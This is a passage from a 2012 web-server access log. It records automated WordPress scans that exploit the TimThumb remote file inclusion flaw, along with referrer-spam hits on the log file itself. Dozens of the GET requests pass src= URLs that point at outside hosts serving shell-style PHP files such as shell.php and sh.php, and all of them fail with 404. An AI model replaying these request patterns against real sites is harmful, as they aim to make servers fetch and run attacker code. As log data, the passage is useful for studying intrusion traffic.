Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)"
62.75.235.18 - - [14/May/2012:04:50:46 +0200] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4\",\"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5\",\"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1\",\"Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\",\"Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\",\"Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112\",\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)\",\"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)"
85.238.107.233 - - [14/May/2012:04:50:50 +0200] "GET /stats/wp-content/themes/widescreen/includes/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.238.107.233 - - [14/May/2012:04:50:51 +0200] "GET /wp-content/themes/widescreen/includes/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:04:51:04 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:51:06 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:51:07 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:51:09 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
72.10.49.128 - - [14/May/2012:04:51:09 +0200] "GET /stats/wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:04:51:09 +0200] "GET /wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:04:51:27 +0200] "GET /stats/wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.10.49.128 - - [14/May/2012:04:51:27 +0200] "GET /wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.community.transpackchile.com/2.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:51:33 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:39 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:40 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:40 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:40 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:41 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:51:41 +0200] "GET //wp-content/themes/ElegantEstate/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:51:42 +0200] "GET /stats/log.keys.html/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:51:43 +0200] "GET /wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:51:45 +0200] "GET /stats/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
85.238.107.233 - - [14/May/2012:04:51:45 +0200] "GET /stats/wp-content/themes/widescreen/includes/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.238.107.233 - - [14/May/2012:04:51:45 +0200] "GET /wp-content/themes/widescreen/includes/timthumb.php?src=http://wordpress.company.draadrianacampos.com.br/2.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
176.28.19.216 - - [14/May/2012:04:51:47 +0200] "GET /stats/wp-content/themes/widescreen/includes/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
176.28.19.216 - - [14/May/2012:04:51:47 +0200] "GET /wp-content/themes/widescreen/includes/timthumb.php?src=http://picasa.communication.mintweb.dk/2.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:04:51:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1180991 "http://plaandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:04:51:49 +0200] "GET /logs/access_log HTTP/1.0" 200 1181217 "http://plaandroid.info/sitemap91.html" "Mozilla/0.6 Beta (Windows)"
78.137.37.171 - - [14/May/2012:04:51:49 +0200] "GET /logs/access_log HTTP/1.0" 200 1181377 "http://plaandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))"
78.137.37.171 - - [14/May/2012:04:51:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1181584 "http://plaandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.137.37.171 - - [14/May/2012:04:51:50 +0200] "GET /logs/access_log HTTP/1.0" 200 1181831 "http://plaandroid.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
95.132.213.162 - - [14/May/2012:04:53:01 +0200] "GET /logs/access_log HTTP/1.0" 200 1182070 "http://androidenplay.info/sitemap119.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
95.132.213.162 - - [14/May/2012:04:53:14 +0200] "GET /logs/access_log HTTP/1.0" 200 1182272 "http://androidenplay.info/sitemap119.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
95.132.213.162 - - [14/May/2012:04:53:22 +0200] "GET /logs/access_log HTTP/1.0" 200 1182511 "http://androidenplay.info/sitemap119.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
95.132.213.162 - - [14/May/2012:04:53:24 +0200] "GET /logs/access_log HTTP/1.0" 200 1182701 "http://androidenplay.info/sitemap119.html" "Opera/8.01 (Windows NT 5.1)"
95.132.213.162 - - [14/May/2012:04:53:27 +0200] "GET /logs/access_log HTTP/1.0" 200 1182867 "http://androidenplay.info/sitemap119.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)"
184.173.6.208 - - [14/May/2012:04:53:42 +0200] "GET /stats/wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
46.45.138.202 - - [14/May/2012:04:53:43 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:53:43 +0200] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
46.45.138.202 - - [14/May/2012:04:53:44 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:54:10 +0200] "GET /stats/wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:54:15 +0200] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET /stats//wp-content/themes/premiumnews/tools/timthumb.php?src= HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET /stats//wp-content/themes/premiumnews/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET /stats//wp-content/themes/premiumnews/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET //wp-content/themes/premiumnews/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET //wp-content/themes/premiumnews/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:55:46 +0200] "GET //wp-content/themes/premiumnews/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
119.110.97.142 - - [14/May/2012:04:56:02 +0200] "GET /stats//wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/?src=http://flickr.com.arc-atmajaya.org/config.inc.php HTTP/1.1" 404 345 "-" "Nokia6300/2.0 (07.00) Profile/MIDP-2.0 Configuration/CLDC-1.1"
78.137.37.171 - - [14/May/2012:04:56:02 +0200] "GET /logs/access_log HTTP/1.0" 200 1186356 "http://plaandroid.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:04:56:04 +0200] "GET /logs/access_log HTTP/1.0" 200 1186554 "http://plaandroid.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)"
119.110.97.142 - - [14/May/2012:04:56:04 +0200] "GET //wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/?src=http://flickr.com.arc-atmajaya.org/config.inc.php HTTP/1.1" 404 339 "-" "Nokia6300/2.0 (07.00) Profile/MIDP-2.0 Configuration/CLDC-1.1"
78.137.37.171 - - [14/May/2012:04:56:04 +0200] "GET /logs/access_log HTTP/1.0" 200 1186998 "http://plaandroid.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:04:56:05 +0200] "GET /logs/access_log HTTP/1.0" 200 1187219 "http://plaandroid.info/sitemap98.html" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)"
78.137.37.171 - - [14/May/2012:04:56:05 +0200] "GET /logs/access_log HTTP/1.0" 200 1187416 "http://plaandroid.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4"
46.45.138.202 - - [14/May/2012:04:56:21 +0200] "GET /stats//wp-content/themes/go-green/modules/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:56:22 +0200] "GET //wp-content/themes/go-green/modules/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:57:36 +0200] "GET /stats//wp-content/themes/go-green/modules/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:37 +0200] "GET /stats//wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:37 +0200] "GET /stats//wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:57:37 +0200] "GET //wp-content/themes/go-green/modules/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:37 +0200] "GET /stats//wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:38 +0200] "GET //wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:38 +0200] "GET //wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:57:38 +0200] "GET //wp-content/themes/go-green/modules/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:57:41 +0200] "GET //wp-content/themes/Memoir/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.15.152.22 - - [14/May/2012:04:58:41 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
64.15.152.22 - - [14/May/2012:04:58:42 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
64.15.152.22 - - [14/May/2012:04:58:43 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
66.23.235.245 - - [14/May/2012:04:58:43 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
66.23.235.245 - - [14/May/2012:04:58:43 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "BlackBerry9700/5.0.0.593 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/613"
66.23.235.245 - - [14/May/2012:04:58:44 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
66.23.235.245 - - [14/May/2012:04:58:44 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "BlackBerry9700/5.0.0.593 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/613"
66.23.235.245 - - [14/May/2012:04:58:45 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
66.23.235.245 - - [14/May/2012:04:58:45 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "BlackBerry9700/5.0.0.593 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/613"
184.106.130.234 - - [14/May/2012:04:58:50 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
184.106.130.234 - - [14/May/2012:04:58:51 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
184.106.130.234 - - [14/May/2012:04:58:52 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1064 Safari/532.5"
202.57.0.19 - - [14/May/2012:04:59:11 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
202.57.0.19 - - [14/May/2012:04:59:12 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
202.57.0.19 - - [14/May/2012:04:59:14 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
66.23.235.245 - - [14/May/2012:04:59:20 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
66.23.235.245 - - [14/May/2012:04:59:21 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
66.23.235.245 - - [14/May/2012:04:59:22 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.19) Gecko/20110430 Iceweasel/3.5.19 (like Firefox/3.5.19) Accept-Language: en-us"
89.33.197.242 - - [14/May/2012:04:59:33 +0200] "GET /stats//wp-content/themes/ElegantEstate/tools/timthumb.php?src= HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
